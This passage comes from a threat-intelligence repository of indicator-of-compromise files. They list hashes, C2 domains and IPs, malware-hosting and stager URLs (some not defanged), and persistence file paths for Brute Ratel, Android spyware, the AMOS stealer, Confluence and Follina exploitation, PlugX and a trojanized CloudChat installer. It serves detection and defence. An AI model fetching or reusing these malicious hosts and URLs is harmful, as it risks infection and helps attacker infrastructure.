sha256,3c931548b0b8cded10793e5517e0a06183b76fa47d2460d28935e28b012e426c,Variant 16 | domain,catalog[.]micrisoftdrivers[.]com,C2 server 17 | -------------------------------------------------------------------------------- /ATK-Brutel.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description, https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/,Observed IoCs for Brute Ratel attacks 3 | sha256,f31d785e7dc5d715a768d0d9565488cbeeb9ab35e4a0895785ecea533692176a,zip file containing Brute Ratel deployment script 4 | ip,5.78.50.172,Destination of Brute Ratel C2 request 5 | filename,emp1_julie ramzel_1040_1120s 2019-2021.zip,Delivery file for Brute Ratel installer 6 | filename,passwords_julie ramzel_1040_1120s 2019-2021.js,Brute Ratel installation / persistence script 7 | sha256,4a8495f03644db7a08d5a995b4f373eff2ade8e61261fb4818ac0bb9da7b0540,ATK/Brutel-K 8 | sha256,f86770a368d75ece9b8542e3087218c01676c0444e18d5d68f53902619049462,ATK/Brutel-H 9 | sha256,f1087f4eff735123ec5ec7fe67b11208c73fc49110bde60cecd42f1a10ed9c89,ATK/Brutel-H 10 | sha256,88908f7a8834ba08a69403af99aca50f61cb8c571fe6b50046ccba5b146f5a45,ATK/Brutel-L 11 | sha256,fe010ed0549c00326f4319c1ac2d16684957a2fd09e0c7bbfec55e92f5d8606c,ATK/Brutel-L 12 | sha256,d5b0c42ef9642dce715b252a07fc07ad9917bfdc13bd699d517b78210cc6ec60,Brute Ratel archive -------------------------------------------------------------------------------- /Android-HiddAd-T: -------------------------------------------------------------------------------- 1 | Indicators of Compromise for ANDR/HiddAd-T malware 2 | 3 | cf. 
https://sophos.wordpress.com/en-us/?p=55524 4 | 5 | Thanks to Trend Micro: 6 | https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/ 7 | https://documents.trendmicro.com/assets/AdwareFoundonGooglePlay_Appendix.pdf 8 | 9 | Web hosts used for command-and-control and ad delivery 10 | 11 | cdn.partycross.com 12 | dialog.usatek.eu 13 | dialog-4a78.kxcdn.com 14 | goldapp-bcf4.kxcdn.com 15 | mny-3f29.kxcdn.com 16 | remoteapp-3d8f.kxcdn.com 17 | remotesettings-3f29.kxcdn.com 18 | 19 | Android app links on Play Market - live (as of 2019-02-13) 20 | 21 | https://play.google.com/store/apps/details?id=com.hemanlia.cityracing.parking 22 | https://play.google.com/store/apps/details?id=com.hemanlia.racing.circuit 23 | https://play.google.com/store/apps/developer?id=Hemanlia 24 | https://play.google.com/store/apps/details?id=com.wastickerapps.flags.stickers 25 | https://play.google.com/store/apps/details?id=com.wastickerapps.heart.stickers 26 | https://play.google.com/store/apps/details?id=com.wastickerapps.animals.stickers 27 | https://play.google.com/store/apps/details?id=com.wastickerapps.espana.stickers 28 | https://play.google.com/store/apps/details?id=com.wastickerapps.nodrugs.stickers 29 | https://play.google.com/store/apps/developer?id=Teapilkate 30 | 31 | Filenames of files used for C2 instructions and advertising delivery 32 | 33 | cros1.txt 34 | cros2.txt 35 | cros3.txt 36 | cross.txt 37 | cross1.txt 38 | cross2.txt 39 | cross3.txt 40 | crossver.jpg 41 | remote.txt 42 | settings.txt 43 | settings_tvbrasil.txt 44 | settings_tvspanish.txt 45 | settings_tvusa.txt 46 | 47 | 48 | -------------------------------------------------------------------------------- /Android-fauxanticovid.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"Indicators of bogus ""tousanticovid"" Android 
malware",https://news.sophos.com/en-us/2020/12/18/fishy-french-covid-contact-tracing-app-is-a-data-thief-pest/ 3 | sha256,4bbca6222f38ba4996a85bbc38c1ce6cf03e4a417dca28513c24c5799388add2,"""dog.sail.battle"" APK" 4 | sha256,7d7a99bb0893762b0b520666c55871614cfb6ffa5159ca5862d70c048d92889e,"""dog.sail.battle"" classes.dex payload" 5 | sha256,0ab6112b07b5c5c9cd0399c202b55c781ddf07539b13f90e12659e209d623500,"""trust.dragon.more"" APK" 6 | sha256,4fe6e62eed2ba12104e19ccc691e157a38d7f8f60acfbfcb5ca2184624256df7,"""trust.dragon.more"" classes.dex payload" 7 | sha256,c1dd9c26671fddc83c9923493236d210d7461b29dd066f743bd4794c1d647549,"""tuna.obvious.trust"" APK" 8 | sha256,72d5e65c99d24da89431fd445a57c7ed7aa34d4b97a4084cc7ef51b1a49e3cd9,"""tuna.obvious.trust"" classes.dex payload" 9 | sha256,5a4b556ab46d9e1e86e9cc1f7a233d53c589ecd3ba820ee7255a488f1c145311,"""tuna.obvious.trust"" json payload" 10 | sha256,c34367f5395f513b8ee0dedcd5502aed69172e71004a80c1f896ca97e05f4f62,patch.ring0 payload 11 | domain,newwaystadium.top, 12 | domain,bandofdna.top, 13 | domain,clubmasters.top, 14 | domain,jrdonnald.top, 15 | domain,differentplayers.top, 16 | ip,8.208.96.239, 17 | ip,8.208.103.115, 18 | ip,47.254.175.73, 19 | ip,47.254.146.169, 20 | ,, 21 | ,, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | -------------------------------------------------------------------------------- /Android-pakchat.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"Indicators of ""pakchat"" Android malware",https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/ 3 | domain,kv33.zapto.org, 4 | domain,pakchat.online, 5 | domain,tplinsurance.xyz, 6 | domain,pmdu.info, 7 | domain_port,kv33.zapto.org:8887, 8 | url,pmdu.info/download/pak_citizen_portal_219.apk,SHA256 0785e57d59fe9651ac7452ec9c4b04dec2185dfcefad10ce9b0fa077c4aaac02 9 | ip,172.241.27.67,kv33.zapto.org 10 | ip,212.73.150.142,tplinsurance.xyz 11 | 
ip,46.183.221.240,pakchat.online 12 | ip,5.2.78.240,pmdu.info 13 | sha256,0785e57d59fe9651ac7452ec9c4b04dec2185dfcefad10ce9b0fa077c4aaac02,Pakistan Citizen Portal (com.govpk.citizensportal) 14 | sha256,139d59594d40def4d4036427f6529fe1d67de9862f7caca2d7ccf33b7fb72bfb,(test app) 15 | sha256,21e1af612302288812ab92f1786739e1877c278c520ed26e247f9b6536d0fe4b,TPL Insurance (com.tpl.insuranceapp) 16 | sha256,25444f614123d80c6dbfde4947a7af2c0ae3ce57ffbbafa7af7ff1aa8e65b77c,(test app) 17 | sha256,2bb5041907b8d74f2c123de67175a6da8747a3c1a817d006a797e863ef2f82d2,(test app) 18 | sha256,333603e999459ab1ba6f3b2b95a44d06f16abf9bbd3afbd80790ea9f88b24c83,(test app) 19 | sha256,385ef5bc6e02d7438e3c7f4b77030560435f2bf186de1d949a0855824cd88df0,(test app) 20 | sha256,6af0070f460effd0610939dda17429740d07d3d5ac496de88870b6160bb93224,Pakistan Salat Time (com.tos.salattime.pakistan) 21 | sha256,6bc9cf05d24024bf47bf6f3afddf62768bf99a065114a069674f5a0f8218b0c4,Pakistan Citizen Portal (com.govpk.citizensportal) 22 | sha256,77b6efb8d3e2be11da3d87dc18aa65e69d02f6615762dd62a15c40cae69dc421,(test app) 23 | sha256,89630dcc54e2d0f76bee8ece998b3daebee16a429309950576548ee343723cda,(test app) 24 | sha256,9ad611b1b01be253d460c33c673fd9270daba6af323c3a216ca7f2cf1f298443,class_tpl.dex DEX file payload 25 | sha256,bbe147df50234100c7d47b8a26cb3675484c2661bf2554ec327a58f37493a86b,(test app) 26 | sha256,be8250766f6669f84a4a73471fea6605a7a54ac255f601aefbc0ce810e11e858,Mobile Packages Pakistan (com.blogspot.istcpublishers.mobilepackagespakistan) 27 | sha256,dd2efee37ca82813bc1948aaeccbda4b6c025b5ba9c1c5f0ddbf590c6c5d0ac8,TPL Insurance (com.tpl.insuranceapp) 28 | sha256,df8c823f648fd33236955d47a9c4b15e320fbd9d031516b6985441b527e888a8,Registered SIMs Checker (com.siminformation.checker) 29 | sha256,e93b499f7b286bac53b1d39b25caa5d6ab0cabe30393e23b0946ebba49d34d53,Pakistan Chat (com.PakistanChatMessenger) 30 | sha256,ec776cdf07bfc3d153dbb94c975e0e5bf5bd7ebd1558994ea7ce765ec9561d9f,(test app) 31 | 
sha256,fd91516432e63b0a100059ed2de0ed559965ee24c9aee37ec4b9146e0d0a4ed1,class.dex DEX file payload 32 | url_path,/Chat_view/api/device_info.php, 33 | url_path,/Chat_view/api/dex/class.dex, 34 | url_path,/Chat_view/api/file_manager.php, 35 | url_path,/Chat_view/api/json/call_log.php, 36 | url_path,/Chat_view/api/json/contact.php, 37 | url_path,/Chat_view/api/json/log_data.php, 38 | url_path,/Chat_view/api/json/message.php, 39 | url_path,/Chat_view/api/location.php, 40 | url_path,/insurance/products/device_info.php, 41 | url_path,/insurance/products/dex/class_tpl.dex, 42 | url_path,/insurance/products/file_manager.php, 43 | url_path,/insurance/products/json/call_log.php, 44 | url_path,/insurance/products/json/contact.php, 45 | url_path,/insurance/products/json/log_data.php, 46 | url_path,/insurance/products/json/message.php, 47 | url_path,/insurance/products/location.php, 48 | url_path,/mobisync, 49 | -------------------------------------------------------------------------------- /Android_C23-spyware.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | sha256,33f79a64fee300f60541a96e2b0c4bcec3aac6f717dff52baa9da7ed803ed6f3,app.lite.bot 3 | sha256,56becf7125a1596e30f80befb986ae96e18da5be40cc3f78ac0c35ae7a4e17ae,app.lite.bot 4 | sha256,57afc0eac8b23d955b75585d5ca7b086a7e17df94b9cb276847ec1c5fe6b6c1a,org.light.upgrade 5 | sha256,c054f6597665fccd18751a88d15488657ff19a286dbd4aac7ecb773b0df60c4d,app.lite.bot 6 | sha256,db511ead013e21f51303dd4f6a856418f88d72a7f95c0b2ace0c3ba80866bdf6,com.example.telegram 7 | sha256,57bc6b95ecea7e0ca34174f1190de1e9664408311c973866b853d24f41b0e760,com.example.telegram 8 | sha256,e00179c7bc76f90864f32275de183f76730cd4a99173c0b6fd6504afa02c8d55 ,com.example.sec_chat 9 | certificate_serial,ece521e38c5e9cbea53503eaef1a6ddd204583fa, 10 | certificate_serial,d00cb9a0ab2313ee74b931a2ff7783ff3c490dac, 11 | certificate_serial,61ed377e85d386a8dfee6b864bd85b0bfaa5af81, 12 | 
certificate_serial,9b3a506c105d3b5ab4bd7549a8102a99ec3796cc, 13 | url,hxxps://www.jose-ross.com/api/api_portal, 14 | url,hxxps://donald-grigg.site/api/FZnW8Y, 15 | url,hxxps://donald-grigg.site/api/zsDFwsa, 16 | url,hxxps://donald-grigg.shop/api/FZnW8Y, 17 | filename,org.light.upgrade, 18 | filename,app.lite.bot, 19 | filename,com.example.telegram, 20 | filename,com.example.sec_chat, 21 | domain,jose-ross.com, 22 | domain,donald-grigg.site, 23 | domain,donald-grigg.shop, 24 | -------------------------------------------------------------------------------- /Atomic-infostealer-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to Atomic MacOS (AMOS) infostealer,https://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos 3 | sha256,01082cd4733e5f3e2c3f642fa6c0afb5a9489d39ff26a35549263fc0e02ebad3,AMOS sample 4 | sha256,bda2503fc02b11258399cfabd0778a997654b5bd7d30e5e3f5bef54a74b914e1,AMOS sample 5 | sha256,C43e506c9b964dddf6fd784bf0cc78b4a2396f47257361dc22e1070e249eae16,AMOS sample 6 | sha256,4dce8b3beba71b8b44b6576ff2497ed68c6fafebd046822f0d60f8758238e900,AMOS sample 7 | sha256,564b21c293bc9d0885dc7a87dbf488a497c98d2103d91f5bbcfdb476eb8b6f4c,AMOS sample 8 | sha256,b351e3f475681ab2e8db5b2bbd2beaf26e5b4fd082ca08eba6fffbc76370113c,AMOS sample 9 | sha256,8891e7562eb4db253a8582376083ca99b19457680f9d36a5ba4108790740785e,AMOS sample 10 | sha256,716778bab5fb2c439a51362be5941a50d587714d58a6faa39eefa96aa79c1561,AMOS sample 11 | sha256,d23491dd351f43f0efad5cee2be80c4049349a7695c0e7de1de632c791356183,AMOS sample 12 | sha256,7bcfcc90d0bd6c85b5b1cc9f287e161020571a0418afb50f2dd67685e9d3a4fc,AMOS sample 13 | domain,nextnovatech.com,Domain which hosted AMOS malware 14 | domain,wooofi.com,Domain which hosted AMOS malware 15 | domain,slackcomtop.aab-e-pak.com,Malvertising domain 16 | domain,slackforbusiness.net,Malvertising domain 17 | 
url_path,slackforbusiness.net/api.php,Malvertising domain 18 | url_path,slackforbusiness.net/main.php,Malvertising domain 19 | domain,macpaw.us,Malvertising domain 20 | -------------------------------------------------------------------------------- /CVE-2018-0798 RTFs: -------------------------------------------------------------------------------- 1 | As referenced in https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/ 2 | 3 | This is not a comprehensive list of samples, but examples of malicious RTF files that abuse Equation Editor to deliver the payloads named here: 4 | 5 | 74ae0b8d7bef81cffd520a07e2998ba49e83b912 -> Fareit 6 | 92f5b35847b3c4fb1b888a01da1affcc6f29a8ae -> Fareit 7 | 52171176b0a6ba2577e52b9f45cc2192c3740a8f -> Fareit 8 | a5d1dc74f9bd45b499942f4cc274783691ea936b -> FormBook 9 | 4c67b346a4541ea6ebbf02c893ecb4b8da8217c4 -> AzoruLT 10 | b2320f9944f4d186d6b684d462dee37711535003 -> Lokibot 11 | 5fd1c86426a5d67271c9e35655a0eb848ba83996 -> Lokibot 12 | -------------------------------------------------------------------------------- /CVE-2022-26134_attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to exploits against Confluence servers (CVE-2022-26134),https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers 3 | sha256,8cc698fe9018b617b7a5e442e5e2c2d7bb015ef39a02908d55976bb8e45991db,PHP reverse shell (Troj/WebShel-DB) 4 | sha256,f4575af8f42a1830519895a294c98009ffbb44b20baa170a6b5e4a71fd9ba663,ASP reverse shell (Troj/WebShel-BU) 5 | sha256,f301501b4e2b8db73c73a604a6b67d21e24c05cb558396bc395dcb3f98de7ccf,Cerber ransomware payload 6 | sha256,96fd2b9ddd43ce02cde9efd4b994cc96616d37c4d6b98d811006d13019e18ece,Cobalt Strike precursor script (ATK/ChimeraPS-A) 7 | url,hxxp://149.57.170.179/mirai.x86/mirai.x86,pwnkit download 8 | 
url,hxxps://webhook.site/53857c02-8d5f-4163-8c13-f2dfb8b3e8c2/, 9 | url,hxxp://46.101.193[.]140/tmp.1w,URL hosting Cerber ransomware 10 | url,hxxp://167.99.57[.]116/tmp.2w,URL hosting Cerber ransomware 11 | url,http://159.223.34[.]25/tmp.3w,URL hosting Cerber ransomware 12 | ip,159.234.34.25,IP hosting Cerber ransomware 13 | -------------------------------------------------------------------------------- /CVE-2022-3236_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from this published report,https://news.sophos.com/en-us/2022/10/19/sophos-x-ops-finds-attackers-using-covert-channels-in-backdoor-against-devices/ 3 | domain,lifeforkids.org,Network activity 4 | domain,thecybernetwork.org,Network activity 5 | filename,/var/.aoq9,Payload delivery 6 | filename,/var/.HML4,Payload delivery 7 | filename,/var/.x7ZZ,Payload delivery 8 | filename,/var/.xAKW,Payload delivery 9 | filename,/tmp/.s.PGSQL.5432.lock.,Persistence mechanism 10 | filename,/var/cache/update.log,Persistence mechanism 11 | filename,agent_keys,Persistence mechanism 12 | filename,/var/ime.pl,Persistence mechanism 13 | filename,/var/tmp/new_keys,Persistence mechanism 14 | filename,/var/syslog-ng.cfg,Persistence mechanism 15 | filename,MANIFEST.MF,Persistence mechanism 16 | filename,metasploit.dat,Persistence mechanism 17 | filename,Payload.class,Persistence mechanism 18 | filename,/var/.s,Persistence mechanism 19 | filename,/var/.p,Persistence mechanism 20 | filename,/usr/share/jetty/lib/.ser.dat,Persistence mechanism 21 | filename,/var/SessionAgent,Persistence mechanism 22 | filename,/var/wafdb,Persistence mechanism 23 | filename,/var/sqlite_lib,Persistence mechanism 24 | filename,/var/.Sophos,Persistence mechanism 25 | filename,/var/logfile,Persistence mechanism 26 | filename,/var/logd,Persistence mechanism 27 | ip,8.218.20.170,Network activity 28 | ip,49.157.28.67,Network activity 29 | ip,49.157.28.12,Network 
activity 30 | ip,45.154.13.158,Network activity 31 | ip,103.38.214.96,Network activity 32 | ip,103.254.75.233,Network activity 33 | ip,2.59.153.108,Network activity 34 | ip,116.93.124.244,Network activity 35 | ip,43.243.127.203,Network activity 36 | ip,116.93.120.66,Network activity 37 | ip,2.59.153.110,Network activity 38 | ip,158.247.233.20,Network activity 39 | ip,154.220.2.207,Network activity 40 | ip,45.32.99.124,Network activity 41 | ip,2.59.153.65,Network activity 42 | ip,158.247.199.212,Network activity 43 | ip,47.254.38.85,Network activity 44 | ip,8.210.125.223,Network activity 45 | ip,98.159.232.194,Network activity 46 | ip,193.37.32.134,Network activity 47 | ip,193.176.211.245,Network activity 48 | ip,98.159.232.228,Network activity 49 | ip,47.242.146.145,Network activity 50 | ip,91.98.100.186,Network activity 51 | ip,109.248.19.89,Network activity 52 | sha256,1c067b1cb684b39f647d8cb26ed286b3a9797acfef1c05ca58d6535c77c90bcd,Payload delivery 53 | sha256,fe98309d6697b669406a5b8ac8100e569ff0bfa12b6a97309f5fbddd79f1401a,Payload delivery 54 | sha256,8a070d10b14003bc8c6217bd9dc73e3d8f4771b9053a51a8a3071ec13b15cb12,Payload delivery 55 | sha256,ff8cb500398e85087f501dcf34194b419de64298378e22ffbaf7b17fe2fa41b2,Payload delivery 56 | sha256,7795454b2ca74c065ecb7281e0e02c224a26877d96243264e6469d18f1a3725b,Payload delivery 57 | sha256,b8a7d4636545f1402230166186ab681b46b8b1a08fcea6435d022ce677bd39c4,Payload delivery 58 | sha256,24cc043f1a70fde20c779cd24d6bf906680725a8096a31bcadf8cf13c532092c,Payload delivery 59 | sha256,cf52a7888913a0370983484b3d885f64ad3b1603721b1967f571afe14ff30614,Payload delivery 60 | sha256,378c05bf38a097e0092251d562dbac723b37f4b7a42e3b91c1623773d9ad6f0b,Payload delivery 61 | sha256,487bc1cf00f37606cff612321c2d75f54565a7b8bc6c0a8be15ef30ee4d4f33c,Payload delivery 62 | sha256,77ee7861903ede9ae3491dca0c0ef89286c5a0bdf223617ea3acb49e25c996af,Payload delivery 63 | sha256,62ef532c0818e89e385457f8d7a7b1ed1f089e40eb6e41fd46e34be4ca34929b,Payload delivery 
64 | sha256,eb00b14dd2fd2bc316597159a8a95c38ac57ab96e8e0f228abf3658a3a5d9e25,Payload delivery 65 | sha256,468e6d852f308391d912564cf6809a93a35bcc90ec01fb3ab5338e781a3e67f9,Payload delivery 66 | sha256,8b62a849cb78ce0823efaded3b6b449dea20de21c0d211bb9191a367dd8427cd,Payload delivery 67 | sha256,7f36e13e6ac0197a76dd067508aee19b3c3af894c2118bb116bef500112a66aa,Payload delivery 68 | sha256,c716da8d8bfabc7309a8ee84d126b38404575c1903716c35ad9ef830847d523d,Payload delivery 69 | sha256,797928fd9bed6967c9951d6f76043e9d5527fae6e0e0808910f57edfe37badd0,Payload installation 70 | sha256,33203910db4bbcf10a70831ec6033269cc0eaa577b28e45b18f1a1731cdb093d,Payload installation 71 | sha256,8bc5de6f2182c6a3a0fa42ee318f7fcfa6bba041cb2605afdbef8b4dfba3f8b3,Payload installation 72 | sha256,400f7c32e6ad12626c33db75a71bf3365b2a2390e27705948116fd14e14108d0,Payload installation 73 | sha256,8807d3af522ab2509c926d5103d7b40fb83627ce5d6c46d4ca0f180df5460d13,Payload installation 74 | sha256,fe4f6d515e597a34d6b3cc7a067455aa01409048e314400f9515175daa1b050b,Payload installation 75 | sha256,c20ed7139ad4666cf3167cca41ae85b4d967969e2f76e59dab2cd30a14ae9f90,Payload installation 76 | sha256,0c4c5c036272eb19d5617c9ce072e14ffb795a354dc682e6b0d144143ac4c7b4,Payload installation 77 | sha256,972303aa2e791855e679559ce13f5dd2bc7b8197c4372212ea130fd3489f8ff2,Payload installation 78 | sha256,87947ae2f74a14cecba57d00b9b35a1a0d63ecb572523ceb4d55343e72d88174,Payload installation 79 | sha256,25fbfaa4ed12117c763a851aaaf83f901dc44b963a5269526c31845c54cbd518,Payload installation 80 | sha256,f2878d5530a4155c20c0e31b37106b73dd88094aa615156026462ab6a7c719f2,Payload installation 81 | sha256,ee3b8c0811a437f5e0962156b3e7e0d87bd63f488dce8dd43f4e1d28949a9b39,Payload installation 82 | sha256,46a4ca13eb7df6db23d309e0442694b35ecffa5bebfc3a4af1fda3c1f6ba79f4,Payload installation 83 | sha256,4706478c6a8d4d96826d0bc31150c7df7cf1ecda8b07e07d874c2e3c62478389,Payload installation 84 | 
sha256,6bb5c05e4b6a9226ac27c59808bd10f4dc685df92bff163f8dfde6a95273062d,Payload installation 85 | sha256,9b1a1156ffbcc1349978b971f983b1bb816781844581f403da1b6517f86424f0,Payload installation 86 | ,, 87 | ,, 88 | "#In addition, we observed that the following legitimate files were modified by attackers",, 89 | filename,/bin/screenmgr.pl,Persistence mechanism 90 | filename,/lib/perl5/5.20/CLV/WebsocketServer.pm,Persistence mechanism 91 | filename,/usr/share/jetty/lib/servlet-api-3.1.jar,Persistence mechanism 92 | -------------------------------------------------------------------------------- /CloudChat-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Thread on CloudChat installer compromise,Observed IOCs for CloudChat installer compromise 3 | sha256,74212e85ce765cbabb16395834de85d1882fb5fc6c98a67e7b9092969b999948,Trojanized CloudChat installer 4 | sha256,f7c139534459bbebab8a919bf9f2bac233caffcde5d072d1b10bc82ce233d875,Trojanized CloudChat installer 5 | sha256,89b91f421e2a7b151e55583fb9182f74738b5eb1105143e80fb2f0b6fac9b7ff,Trojanized CloudChat installer 6 | sha256,ece0e08568fe8e8614de830ea07c0217187a347c18c27eb7b18915573f2f76b8,Trojanized CloudChat installer 7 | sha256,f8103fbbdf94b4b00722fa78b343735c124663d53ca61bbfa2f57ed1c7675786,Trojanized CloudChat installer 8 | sha256,17b31898c3613d6e86d06260c7e6f7738d3afdf0f0a4010e2f5259c502d38b09,Loader DLL 9 | sha256,1aad361237d0960758bb26ee7bbe3c20cccabb1744bb91874198c68dbe6e14ee,Loader DLL 10 | sha256,23604a06b0720a430f8d6f6b14b589d850e4cfd291a47f22f199324f21169c1a,Loader DLL 11 | sha256,8823cccd97d261053a89cc9ebdfafe8f828f2b811c722914156f28d8bd239970,Loader DLL 12 | sha256,8f40e019a09dc2b16ac3e9c3902844313d4c75df35c3d40c4376d14c320f08c3,Loader DLL 13 | filename,code1.dll,Loader DLL 14 | filename,d3lib1.dll,Loader DLL 15 | filename,code3.dll,Loader DLL 16 | url_path,https://ilha.tw/images/top_product05.png,Stager payload 17 | 
url_path,https://liveware-a.tw/images/top_product05.png,Stager payload 18 | url_path,https://www.emetore-tw.com/images/top_product05.png,Stager payload 19 | url_path,https://www.sibody.tw/images/pic_brand_00.png,Stager payload 20 | url_path,https://www.sibody.tw/images/pic_brand_01.png,Stager payload 21 | url,https://ilha.tw,Stager payload domain 22 | url,https://livewire-a.tw,Stager payload domain 23 | url,https://www.emetore-tw.com,Stager payload domain 24 | url,https://www.sibody.tw,Stager payload domain 25 | ip,5.181.132.169,C2 26 | ip,45.121.147.227,C2 27 | ip,103.75.191.90,C2 28 | ip,103.169.91.16,C2 29 | url,api.holencity.com,C2 30 | url,solar.chatgroup.org,C2 31 | url,www.cloudchatpc.com,C2 32 | mutex,lks2x,Mutex 33 | -------------------------------------------------------------------------------- /Cryptorom_fakeapps_2.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | url,https://apps.apple.com/us/app/bone-global/id6446169496,iOS fake crypto app 3 | url,https://apps.apple.com/US/app/berryx/id6444883215,iOS fake crypto app 4 | url,https://apps.apple.com/us/app/momclub/id6446796051,iOS fake crypto app 5 | url,https://apps.apple.com/us/app/koproplus/id6447481214,iOS fake crypto app 6 | url,https://apps.apple.com/us/app/clueeio/id6446766050,iOS fake crypto app 7 | url,https://apps.apple.com/us/app/cmus/id6446474214,iOS fake crypto app 8 | url,https://apps.apple.com/ph/app/nicaragua-bitcloud/id1669626299, iOS fake crypto app 9 | url,https://apps.apple.com/ph/app/uou-pro/id6446106583, iOS fake crypto app 10 | url,https://play.google.com/store/apps/details?id=plus.BoneGlobal, Android fake crypto app 11 | SHA256,c9a0338ba68e0bbbf06d1bd763e4f4d89a53cf3f0edffa7f0a270bcf459dbe87, iPhona fake app bundleID - com.BookProtector.myreadexperice 12 | SHA256,a712d7ccf54188ec2986a0d4ebe616d52a88624f8efb7f8e1230e54eda5b29ad, Android fake app packagename - plus.BerryX 13 | domain,momclub-coin.com, C2 for fake crypto 
app 14 | domain,melnie.net, C2 for fake crypto app 15 | domain,coinclue.com, C2 for fake crypto app 16 | domain,koexchange.tw, C2 for fake crypto app 17 | -------------------------------------------------------------------------------- /DLLsideloading-PlugX-USBworm-2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/,Indicators of PlugX USB worm variant active Jan-2023 3 | sha256,352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a,"wsc.dll, malicious loader" 4 | sha256,5b807629ab299abec70f88f861487c55a6795d6e27e5d85c64080f072132558c,"wsc.dll, malicious loader" 5 | sha256,6bb959c33fdfc0086ac48586a73273a0a1331f1c4f0053ef021eebe7f377a292,"wsc.dll, malicious loader" 6 | sha256,e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d,"wsc.dll, malicious loader" 7 | sha256,edaa8b62467246d9a43e0f383ed05bc3272d2f8b943a79d9d526f8225c58d1e6,"wsc.dll, malicious loader" 8 | sha256,432a07eb49473fa8c71d50ccaf2bc980b692d458ec4aaedd52d739cb377f3428," *AvastAuth.dat , payload file" 9 | url,45.142.166.112,C2 server 10 | -------------------------------------------------------------------------------- /Follina_CVE-2022-30190_hashes.csv: -------------------------------------------------------------------------------- 1 | type,hash,notes 2 | description,Files related to Follina attacks described in our blog post,https://news.sophos.com/en-us/2022/05/30/follina-word-doc-taps-previously-unknown-microsoft-office-vulnerability/ 3 | sha256,36482C40E2D334804AC41992FDCD1167BF0A9DC962960D1C2E4746485FBB4449,02678915_609919.img 4 | sha256,67A0F87F0A02928A5D5FCADA88F0140DD49F3C08B560AF9C5A6041C755369BC1,02678915_609919.zip 5 | sha256,A3FA09129376C9AB281222188F1C4567BC71D74BBEC49B1533923085D0B01BFA,26557006_614812.img 6 | sha256,6D183B80241DB4ADFEF8FCF140B393492DA3E552FB4FC0F2A2EFF1FE4DA26909,26557006_614812.zip 7 | 
sha256,7A65ED17321546D130111899D9F9D443C9389D9D161BD34DA38486BDBBC8F197,30396299_590251.img 8 | sha256,2BD51003F5E62E5BF21C966276F0A3DDD02132BD679772F893997B53AF913253,30396299_590251.zip 9 | sha256,E7CAE387EC2495D34F837B56CE108FD0159EF6FC4451EB2A27C27CDDEED85F3B,32334184_838865.img 10 | sha256,A4B20C7366C87533A4C2A1667669BB8B1D447CA5636682272ACBE0B1850C1E61,32334184_838865.zip 11 | sha256,453BFE8C92D5A46F4234557E94FD90F5750D71DFFB8951901C886A89A39E3007,45620617_040352.img 12 | sha256,616685E44142E4482B5882F293BDB4A2EC09BE5279DE81D6D6BC3325ED37D728,45620617_040352.zip 13 | sha256,93B33CBD26A04342F6A27DEC12ADEF0643176BA034B69788EB60CFFCFBBBB328,76380133_398594.img 14 | sha256,7250223E21C275113EFEBAE86CFA930943D2672A9304884A3763C5AA636AA556,76380133_398594.zip 15 | sha256,D2FEE623915B8FA700887A3906C4A336CCD021AEEF13E8D4F2C9A8999269ED58,81309141_826084.img 16 | sha256,CD52A66892E2AD2C1264FB2127FC09DB35DF972096136385EACAB36D3C24375E,81309141_826084.zip 17 | sha256,44B38A16CDAA3F5C56E3C9ECBD4688CCE035EC59E5853B8497587017CE5BFF0A,82360680_720820.img 18 | sha256,F9D6759B695E2E8CA5D7F10C396315820D6B607451B34C6322B2C299A33F660B,82360680_720820.zip 19 | sha256,CAC7A421BFB9DB223494EE6A3E07409ACE4C336DFF810FD33B0C7C3C18201893,87543611_161292.img 20 | sha256,E82B7464ACF14B443269E414674C4E4CF4FA7A0259105B784B09104FD9F95741,87543611_161292.zip 21 | sha256,F62B9BE746830B13DFE88FD56D00DC1CBF21F3FF14BD3B359501FD79CF870DC6,90405769_114456.img 22 | sha256,AE26211E0A48C80576D0EEF2EC919BE08E6E0D4B83BA940A53509352ABBC457A,90405769_114456.zip 23 | sha256,077CA8645A27C773D9C881AECF54BC409C2F8445AE8E3E90406434C09ACE4BC2,02678915_609919\019338921.dll 24 | sha256,03160BE7CB698E1684F47071CB441FF181FF299CB38429636D11542BA8D306AE,Windows shortcut .lnk file (various filenames/reused) 25 | sha256,D20120CC046CEF3C3F0292C6CBC406FCF2A714AA8E048C9188F1184E4BB16C93,Follina-maldoc (various filenames/reused) 26 | 
